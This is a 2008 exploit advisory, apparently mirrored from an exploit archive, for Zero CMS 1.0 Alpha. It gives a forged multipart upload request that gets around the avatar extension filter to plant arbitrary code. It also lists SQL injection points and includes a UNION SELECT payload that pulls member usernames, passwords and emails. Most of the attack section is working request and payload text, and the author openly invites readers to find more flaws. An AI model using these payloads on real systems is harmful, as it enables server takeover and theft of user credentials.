[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Zero CMS 1.0 Alpha Arbitrary File Upload / SQL Injection Vulnerabilities
# Published : 2008-01-08
# Author : KiNgOfThEwOrLd
# Previous Title : SmallNuke 2.0.4 Pass Recovery Remote SQL Injection Exploit
# Next Title : EvilBoard 0.1a (SQL/XSS) Multiple Remote Vulnerabilities
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| ____ __________ __ ____ __ |
| /_ | ____ |_______ _____/ |_ /_ |/ |_ |
| | |/ | | _(__ <_/ ___ __ ______ | __ |
| | | | | |/ ___| | /_____/ | || | |
| |___|___| /__| /______ /___ >__| |___||__| |
| /______| / / |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Zero CMS Remote Arbitrary File Upload / SQL Injections |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Version: <= 1.0 Alpha (Last) |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Vendor: www.zero-cms.com |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Discovered by: KiNgOfThEwOrLd |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Intro: |
| |
| An attacker can bypass the avatar upload extension filter editing |
| the contenet type propriety |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Exploit: |
| |
| Submit to index.php?act=usercp&action=avatar a request like this: |
| |
| -----------------------------4629606643545053171986629955rn |
| Content-Disposition: form-data; name="MAX_FILE_SIZE"rn |
| rn |
| 20000rn |
| -----------------------------4629606643545053171986629955rn |
| Content-Disposition: form-data; name="avupload"; filename=" |
| [FILENAME].[EVIL_EXTENSION]"rn |
| Content-Type: image/jpegrn |
| rn |
| [EVIL_CODE]n |
| rn |
| -----------------------------4629606643545053171986629955rn |
| Content-Disposition: form-data; name="submit"rn |
| rn |
| Uploadrn |
| -----------------------------4629606643545053171986629955-rn|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| SQL Injections: |
| |
| The most of the variable related with the database are not properly|
| checked. Then, we get a lots of possible sql injections. |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Some Examples: |
| |
| index.php?act=poll&mode=view&id=%27 |
| forums/index.php?f=%27 |
| forums/index.php?t=%27 |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| An Exploit Example: |
| |
| index.php?act=poll&mode=view&id=9999+union+all+select+1,username, |
| password,email,5,6,7,8,9,10,11,12,13,14+from+zc_members |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
| Surelly there are other not filtred vars, but i don't feel like to |
| check, if u want u can find that yourself, dont you? :P |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
# www.Syue.com [2008-01-08]